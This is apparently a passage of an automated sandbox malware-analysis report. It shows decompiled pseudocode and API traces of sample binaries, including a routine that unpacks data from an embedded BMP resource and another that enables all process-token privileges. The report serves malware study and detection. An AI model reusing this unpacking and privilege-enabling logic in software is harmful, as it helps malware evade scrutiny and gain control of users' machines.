    									_t82 =  *((intOrPtr*)( *((intOrPtr*)(_v0 + 0x1c)) + 0xc));
    									_t83 = _t82 + 4;
    									__eflags = _t83;
    									_v24 =  *_t82;
    									_v32 = _t83;
    									do {
    										_t109 = _t83;
    										_t84 = _v24;
    										_v20 = _t83;
    										_v16 = _t84;
    										__eflags = _t84;
    										if(_t84 > 0) {
    											_t86 =  *((intOrPtr*)(_t131 + 4)) + _t114;
    											__eflags = _t86;
    											_v28 = _t86;
    											while(1) {
    												_t87 = E01335E46(_t86,  *_t109,  *((intOrPtr*)(_v0 + 0x1c)));
    												_t141 = _t141 + 0xc;
    												__eflags = _t87;
    												if(_t87 != 0) {
    													break;
    												}
    												_t89 = _v16 - 1;
    												_t109 = _v20 + 4;
    												_v16 = _t89;
    												__eflags = _t89;
    												_v20 = _v20 + 4;
    												_t86 = _v28;
    												if(_t89 > 0) {
    													continue;
    												} else {
    												}
    												L29:
    												_t114 = _v12;
    												goto L30;
    											}
    											_t101 = 1;
    											goto L29;
    										}
    										L30:
    										_t83 = _v32;
    										_t114 = _t114 + 0x10;
    										_v12 = _t114;
    										_t123 = _t123 - 1;
    										__eflags = _t123;
    									} while (_t123 != 0);
    								}
    								return _t101;
    							}
    						} else {
    							_t70 = E01336609(_t105, _t98, _a28, _a24,  &_v12,  &_v8);
    							_t111 = _v12;
    							_t142 = _t140 + 0x14;
    							_t116 = _v8;
    							if(_t111 < _t116) {
    								_t17 = _t70 + 0xc; // 0xc
    								_t136 = _t17;
    								_t70 = _a24;
    								do {
    									if(_t70 >=  *((intOrPtr*)(_t136 - 0xc)) && _t70 <=  *((intOrPtr*)(_t136 - 8))) {
    										_t93 =  *_t136 << 4;
    										if( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) == 0) {
    											L13:
    											_t94 = _t93 + _t136[1] + 0xfffffff0;
    											_t129 = _a4;
    											if(( *(_t93 + _t136[1] + 0xfffffff0) & 0x00000040) == 0) {
    												_push(1);
    												_t35 = _t136 - 0xc; // 0x0
    												E01335431(_t98, _t116, _t136, _t129, _a8, _a12, _a16, _t98, _t94, 0, _t35, _a28, _a32);
    												_t116 = _v8;
    												_t142 = _t142 + 0x2c;
    												_t111 = _v12;
    											}
    										} else {
    											_t116 = _v8;
    											_t98 = _a20;
    											if( *((char*)( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) + 8)) == 0) {
    												goto L13;
    											}
    										}
    										_t70 = _a24;
    									}
    									_t111 = _t111 + 1;
    									_t136 =  &(_t136[5]);
    									_v12 = _t111;
    								} while (_t111 < _t116);
    							}
    							goto L17;
    						}
    					} else {
    						__imp__EncodePointer(0);
    						_t130 = _t71;
    						if( *((intOrPtr*)(E01336392(_t98, _t105, __edx, _t119, _t130, _t144) + 8)) == _t130 ||  *_t119 == 0xe0434f4d ||  *_t119 == 0xe0434352) {
    							goto L6;
    						} else {
    							_t70 = E0133652C(_t119, _a8, _a12, _a16, _t98, _a28, _a32);
    							_t140 = _t140 + 0x1c;
    							if(_t70 != 0) {
    								L17:
    								goto L18;
    							} else {
    								goto L6;
    							}
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 01336392: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013388A8
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,01345D54), ref: 01335885
    • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 013358E1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • HeapReAlloc.KERNEL32(00000008,?,?), ref: 1000453A
    • HeapAlloc.KERNEL32(00000008,?), ref: 1000454A
    • HeapSize.KERNEL32(00000000,?,?), ref: 1000455F
    Strings
    • failed memory resize %u to %u bytes, xrefs: 10004566
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 82%
    			E0133B083(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				char _v16;
    				intOrPtr _v24;
    				char _v28;
    				void* _v40;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t34;
    				signed int _t40;
    				int _t46;
    				int _t53;
    				void* _t54;
    				int _t56;
    				signed int _t62;
    				int _t65;
    				short* _t66;
    				signed int _t67;
    				short* _t68;
    
    				_t34 =  *0x1347004; // 0x262637d3
    				_v8 = _t34 ^ _t67;
    				E01336FBD(_t54,  &_v28, __edx, _a4);
    				_t56 = _a24;
    				if(_t56 == 0) {
    					_t53 =  *(_v24 + 8);
    					_t56 = _t53;
    					_a24 = _t53;
    				}
    				_t65 = 0;
    				_t40 = MultiByteToWideChar(_t56, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
    				_v12 = _t40;
    				if(_t40 == 0) {
    					L15:
    					if(_v16 != 0) {
    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
    					}
    					return E01333E82(_t54, _v8 ^ _t67, _t65, _t66);
    				}
    				_t54 = _t40 + _t40;
    				_t17 = _t54 + 8; // 0x8
    				asm("sbb eax, eax");
    				if((_t17 & _t40) == 0) {
    					_t66 = 0;
    					L11:
    					if(_t66 != 0) {
    						E01336200(_t65, _t66, _t65, _t54);
    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t66, _v12);
    						if(_t46 != 0) {
    							_t65 = GetStringTypeW(_a8, _t66, _t46, _a20);
    						}
    					}
    					L14:
    					E0133B1A0(_t66);
    					goto L15;
    				}
    				_t20 = _t54 + 8; // 0x8
    				asm("sbb eax, eax");
    				_t48 = _t40 & _t20;
    				_t21 = _t54 + 8; // 0x8
    				_t62 = _t21;
    				if((_t40 & _t20) > 0x400) {
    					asm("sbb eax, eax");
    					_t66 = E0133883E(_t62, _t48 & _t62);
    					if(_t66 == 0) {
    						goto L14;
    					}
    					 *_t66 = 0xdddd;
    					L9:
    					_t66 =  &(_t66[4]);
    					goto L11;
    				}
    				asm("sbb eax, eax");
    				E0133F280();
    				_t66 = _t68;
    				if(_t66 == 0) {
    					goto L14;
    				}
    				 *_t66 = 0xcccc;
    				goto L9;
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 0133B0D0
      • Part of subcall function 0133883E: RtlAllocateHeap.NTDLL(00000000,01332133,?,?,01332133,?), ref: 01338870
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0133B159
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0133B16B
    • __freea.LIBCMT ref: 0133B174
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,10087DA6,00000000,00000000,10086575,?,00000000,?,00000001,10087DA6,?,00000001,10086575,00000000), ref: 1008AA7C
      • Part of subcall function 10086449: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1008AB05
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,10084ED3,?), ref: 1008AB17
    • __freea.LIBCMT ref: 1008AB20
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000014,00000010,?,1000140A), ref: 10082228
    • HeapAlloc.KERNEL32(00000008,0000000A), ref: 10082240
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10082258
    • HeapFree.KERNEL32(00000000,00000000), ref: 1008226E
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 100%
    			E0133458C() {
    				signed int _v8;
    				struct _FILETIME _v16;
    				signed int _v20;
    				union _LARGE_INTEGER _v24;
    				signed int _t21;
    				signed int _t29;
    				signed int _t32;
    				signed int _t36;
    
    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
    				_t21 =  *0x1347004; // 0x262637d3
    				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
    					GetSystemTimeAsFileTime( &_v16);
    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
    					_v8 = _v8 ^ GetCurrentThreadId();
    					_v8 = _v8 ^ GetCurrentProcessId();
    					QueryPerformanceCounter( &_v24);
    					_t29 =  &_v8;
    					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
    					if(_t36 != 0xbb40e64e) {
    						if((0xffff0000 & _t36) == 0) {
    							_t29 = (_t36 | 0x00004711) << 0x10;
    							_t36 = _t36 | _t29;
    						}
    					} else {
    						_t36 = 0xbb40e64f;
    					}
    					 *0x1347004 = _t36;
    					 *0x1347000 =  !_t36;
    					return _t29;
    				} else {
    					_t32 =  !_t21;
    					 *0x1347000 = _t32;
    					return _t32;
    				}
    			}

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 013345C0
    • GetCurrentThreadId.KERNEL32 ref: 013345CF
    • GetCurrentProcessId.KERNEL32 ref: 013345D8
    • QueryPerformanceCounter.KERNEL32(?), ref: 013345E5
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 100831B6
    • GetCurrentThreadId.KERNEL32 ref: 100831C5
    • GetCurrentProcessId.KERNEL32 ref: 100831CE
    • QueryPerformanceCounter.KERNEL32(?), ref: 100831DB
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Strings
    • recovered %d pages from %s, xrefs: 10011477
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • _strpbrk.LIBCMT ref: 100884DF
      • Part of subcall function 1008640F: HeapFree.KERNEL32(00000000,00000000), ref: 10086425
      • Part of subcall function 1008640F: GetLastError.KERNEL32(00000000,?,1008A93D,00000000,00000000,00000000,00000000,?,1008A964,00000000,00000007,00000000,?,1008A2E9,00000000,00000000), ref: 10086437
      • Part of subcall function 10086756: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10086758
      • Part of subcall function 10086756: GetCurrentProcess.KERNEL32(C0000417,10089AEE,1009E658,0000002C,100864A7,00000016,10086C36,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 1008677A
      • Part of subcall function 10086756: TerminateProcess.KERNEL32(00000000,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10086781
      • Part of subcall function 10088620: FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 10088765
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • MultiByteToWideChar.KERNEL32(53128B52,00000009,00000000,00000000,?,00000000,1008215D,00000000,?,?,?,1008215D,00000000,00000000,?,00000000), ref: 10084D12
    • GetLastError.KERNEL32(?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10084D20
    • MultiByteToWideChar.KERNEL32(53128B52,00000001,00000000,00000000,?,00000000,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10084D7B
    • MultiByteToWideChar.KERNEL32(53128B52,00000009,00000000,00000000,00000000,00000000,1008215D,00000000,?,?,?,1008215D,00000000,00000000,?,00000000), ref: 10084DC2
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd

    Executed Functions

    Control-flow Graph

    control_flow_graph (basic blocks: id start-end [calls]; then edges from->to)
    • 124 c61ec0-c61ee7 GetCommandLineW
    • 125 c61eed-c61efe CommandLineToArgvW
    • 126 c62097-c620ad call c51252
    • 127 c61f04-c61f37 call c61850
    • 132 c61f3d-c61f61
    • 133 c61f66-c61f77
    • 134 c61f79-c61fa9 call c61be0
    • 137 c61faf-c61fc0 call c619c0
    • 140 c61fc6-c61fdf call c601b0
    • 143 c61fe5-c61ff0 call c61a00
    • 146 c61ff6-c62012 call c61a30 call c61d10
    • 151 c62018-c62040 CreateFileW
    • 152 c62042-c62045
    • 153 c62081-c62094 call c51252
    • 155 c62047-c6204c
    • 157 c62050-c62059
    • 158 c6205b-c6207b WriteFile CloseHandle
    • edges: 124->125 124->126 125->126 125->127 127->126 127->132 132->133 133->133 133->134 134->126 134->137 137->126 137->140 140->126 140->143 143->126 143->146 146->126 146->151 151->152 151->153 152->153 152->155 155->157 157->157 157->158 158->153
    C-Code - Quality: 71%
    			E00C61EC0() {
    				signed int _v8;
    				signed int _v16;
    				char _v17;
    				short _v19;
    				struct _OVERLAPPED* _v23;
    				char _v48;
    				char _v49;
    				short _v51;
    				struct _OVERLAPPED* _v55;
    				char _v64;
    				int _v68;
    				struct _OVERLAPPED* _v72;
    				intOrPtr _v76;
    				struct _OVERLAPPED* _v80;
    				long _v84;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t41;
    				short* _t43;
    				PWCHAR* _t46;
    				void* _t52;
    				void* _t55;
    				void* _t58;
    				void* _t60;
    				void _t63;
    				void* _t69;
    				WCHAR* _t70;
    				void* _t71;
    				signed int _t76;
    				void* _t83;
    				void* _t90;
    				void* _t91;
    				void* _t92;
    				void* _t94;
    				void* _t95;
    				void* _t97;
    				void* _t99;
    				void* _t100;
    				signed int _t101;
    				signed int _t103;
    
    				_t103 = (_t101 & 0xfffffff8) - 0x4c;
    				_t41 =  *0xc6a004; // 0x26d30358
    				_v8 = _t41 ^ _t103;
    				_push(_t91);
    				_v68 = 0;
    				_t43 = GetCommandLineW();
    				if(_t43 == 0) {
    					L16:
    					_pop(_t92);
    					_pop(_t97);
    					_pop(_t69);
    					return E00C51252(_t69, _v8 ^ _t103, _t92, _t97);
    				} else {
    					_t46 = CommandLineToArgvW(_t43,  &_v68);
    					if(_v76 < 3) {
    						goto L16;
    					} else {
    						_t70 = _t46[2];
    						asm("xorps xmm0, xmm0");
    						_v64 = 0;
    						asm("movq [esp+0x25], xmm0");
    						_v55 = 0;
    						_v51 = 0;
    						_v49 = 0;
    						if(E00C61850(_t46[1],  &_v64) == 0) {
    							goto L16;
    						} else {
    							asm("xorps xmm0, xmm0");
    							_v48 = 0;
    							asm("movups [esp+0x35], xmm0");
    							_t76 = 0;
    							_v23 = 0;
    							asm("movq [esp+0x45], xmm0");
    							_v19 = 0;
    							_v17 = 0;
    							do {
    								 *((char*)(_t103 + _t76 + 0x34)) =  *((intOrPtr*)(_t103 + (_t76 & 0x0000000f) + 0x24));
    								_t76 = _t76 + 1;
    							} while (_t76 < 0x20);
    							_push(_t76);
    							_v84 = 0;
    							_v80 = 0;
    							_v72 = 0;
    							_v68 = 0;
    							_t52 = E00C61BE0(_t76,  &_v84); // executed
    							_t103 = _t103 + 8;
    							if(_t52 == 0) {
    								goto L16;
    							} else {
    								_t98 = _v80;
    								_t77 = _v80;
    								if(E00C619C0(_v80,  &_v72) == 0) {
    									goto L16;
    								} else {
    									_t55 = E00C601B0( &_v84,  &_v72, _t91, _t98, _t98, _t77,  &_v48);
    									_t103 = _t103 + 0xc;
    									if(_t55 == 0 || E00C61A00( &_v72) == 0) {
    										goto L16;
    									} else {
    										E00C61A30(); // executed
    										_v84 = 0;
    										_t58 = E00C61D10( &_v84,  &_v72); // executed
    										if(_t58 == 0) {
    											goto L16;
    										} else {
											_t94 = _v84 != 0 ? _v84 : L"<NULL>"; // executed
    											_t60 = CreateFileW(_t70, 0x40000000, 2, 0, 3, 0, 0); // executed
    											_t99 = _t60;
    											if(_t99 != 0 && _t99 != 0xffffffff) {
    												_t83 = _t94;
    												_t90 = _t83 + 2;
    												do {
    													_t63 =  *_t83;
    													_t83 = _t83 + 2;
    												} while (_t63 != 0);
    												_v84 = 0;
    												WriteFile(_t99, _t94, (_t83 - _t90 >> 1) + (_t83 - _t90 >> 1),  &_v84, 0); // executed
    												CloseHandle(_t99);
    											}
    											_pop(_t95);
    											_pop(_t100);
    											_pop(_t71);
    											return E00C51252(_t71, _v16 ^ _t103, _t95, _t100);
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    Instruction address range of the decompiled lines above: 0x00c61ec6-0x00c620ad

    APIs
    • GetCommandLineW.KERNEL32 ref: 00C61EDF
    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00C61EF3
      • Part of subcall function 00C61BE0: GetModuleHandleW.KERNEL32(00000000), ref: 00C61C00
      • Part of subcall function 00C61BE0: FindResourceW.KERNEL32(00000000,00000065,BMP), ref: 00C61C1B
      • Part of subcall function 00C61BE0: LoadResource.KERNEL32(00000000,00000000), ref: 00C61C29
      • Part of subcall function 00C61BE0: LockResource.KERNEL32(00000000), ref: 00C61C34
      • Part of subcall function 00C61BE0: SizeofResource.KERNEL32(00000000,00000000), ref: 00C61C43
      • Part of subcall function 00C619C0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00C61C58), ref: 00C619D1
      • Part of subcall function 00C619C0: RtlAllocateHeap.NTDLL(00000000), ref: 00C619D8
      • Part of subcall function 00C61A30: GetCurrentProcess.KERNEL32(000F01FF,?), ref: 00C61A5E
      • Part of subcall function 00C61A30: OpenProcessToken.ADVAPI32(00000000), ref: 00C61A65
      • Part of subcall function 00C61A30: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenPrivileges),00000000,00000000,?), ref: 00C61A9F
      • Part of subcall function 00C61A30: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenPrivileges),00000000,?,?), ref: 00C61AD7
      • Part of subcall function 00C61A30: LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 00C61B21
      • Part of subcall function 00C61A30: AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000010,00000000,00000000), ref: 00C61B98
      • Part of subcall function 00C61A30: CloseHandle.KERNEL32(FFFFFFFF), ref: 00C61BC4
    • CreateFileW.KERNEL32(?,40000000(GENERIC_WRITE),00000002(FILE_SHARE_WRITE),00000000,00000003(OPEN_EXISTING),00000000,00000000), ref: 00C62036
    • WriteFile.KERNEL32(00000000,<NULL>,?,?,00000000), ref: 00C62074
    • CloseHandle.KERNEL32(00000000), ref: 00C6207B
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd

    Control-flow Graph

    control_flow_graph (basic blocks: id start-end [calls]; then edges from->to)
    • 159 c61a30-c61a6d GetCurrentProcess OpenProcessToken
    • 160 c61a6f-c61a7f call c51252
    • 161 c61a80-c61aa3 GetTokenInformation
    • 163 c61aa9-c61abb call c542cc
    • 164 c61bb8-c61bc1
    • 172 c61ac1-c61adb GetTokenInformation
    • 166 c61bca-c61bdc call c51252
    • 167 c61bc3-c61bc4 CloseHandle
    • 173 c61baf-c61bb5 call c542c7
    • 174 c61ae1-c61ae5
    • 175 c61aeb-c61aee
    • 176 c61baa
    • 178 c61af0-c61b29 call c53610 LookupPrivilegeNameW
    • 182 c61b9e-c61ba4
    • 183 c61b2b-c61b2f
    • 184 c61b31-c61b98 AdjustTokenPrivileges
    • edges: 159->160 159->161 161->163 161->164 163->164 163->172 164->166 164->167 167->166 172->173 172->174 173->164 174->175 174->176 175->178 176->173 178->182 178->183 182->176 182->178 183->182 183->184 184->182
    C-Code - Quality: 74%
    			E00C61A30() {
    				signed int _v8;
    				short _v532;
    				int _v536;
    				struct _TOKEN_PRIVILEGES _v548;
    				void* _v552;
    				long _v556;
    				long _v560;
    				long _v568;
    				long _v572;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t28;
    				int _t34;
    				int _t40;
    				int _t46;
    				void* _t52;
    				void* _t53;
    				void* _t54;
    				void* _t59;
    				void* _t60;
    				struct _LUID* _t62;
    				signed int _t63;
    				void* _t64;
    				void* _t65;
    
    				_t28 =  *0xc6a004; // 0x26d30358
    				_v8 = _t28 ^ _t63;
    				_v552 = 0xffffffff;
    				_t61 = 0;
    				if(OpenProcessToken(GetCurrentProcess(), 0xf01ff,  &_v552) != 0) {
    					_t60 = GetTokenInformation;
    					_v556 = 0;
    					_t34 = GetTokenInformation(_v552, 3, 0, 0,  &_v556); // executed
    					if(_t34 == 0) {
    						_push(_v556);
    						_t52 = E00C542CC(_t53);
    						_t65 = _t64 + 4;
    						if(_t52 != 0) {
    							_t40 = GetTokenInformation(_v552, 3, _t52, _v556,  &_v556); // executed
    							if(_t40 != 0) {
    								_t60 = 0;
    								if( *_t52 > 0) {
    									_t12 = _t52 + 4; // 0x4
    									_t62 = _t12;
    									do {
    										E00C53610(_t60,  &_v532, 0, 0x208);
    										_t65 = _t65 + 0xc;
    										_v560 = 0x104;
    										_t46 = LookupPrivilegeNameW(0, _t62,  &_v532,  &_v560); // executed
    										if(_t46 != 0 &&  *((intOrPtr*)(_t62 + 8)) == 0) {
    											asm("xorps xmm0, xmm0");
    											_v572 = _t62->LowPart;
    											asm("movq [ebp-0x234], xmm0");
    											_v568 = _t62->HighPart;
    											asm("movq [ebp-0x21c], xmm0");
    											asm("movq xmm0, [ebp-0x238]");
    											_v536 = 0;
    											_v548.PrivilegeCount = 1;
    											asm("movq [ebp-0x21c], xmm0");
    											_v536 = 2;
    											AdjustTokenPrivileges(_v552, 0,  &_v548, 0x10, 0, 0);
    										}
    										_t60 = _t60 + 1;
    										_t62 = _t62 + 0xc;
    									} while (_t60 <  *_t52);
    								}
    								_t61 = 1;
    							}
    							E00C542C7(_t52);
    						}
    					}
    					_t54 = _v552;
    					if(_t54 != 0xffffffff) {
    						CloseHandle(_t54);
    					}
    					return E00C51252(_t52, _v8 ^ _t63, _t60, _t61);
    				} else {
    					return E00C51252(_t52, _v8 ^ _t63, _t59, 0);
    				}
    			}

    Instruction address range of the decompiled lines above: 0x00c61a39-0x00c61bdc

    APIs
    • GetCurrentProcess.KERNEL32(000F01FF,?), ref: 00C61A5E
    • OpenProcessToken.ADVAPI32(00000000), ref: 00C61A65
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenPrivileges),00000000,00000000,?), ref: 00C61A9F
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenPrivileges),00000000,?,?), ref: 00C61AD7
    • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 00C61B21
    • AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000010,00000000,00000000), ref: 00C61B98
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00C61BC4
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
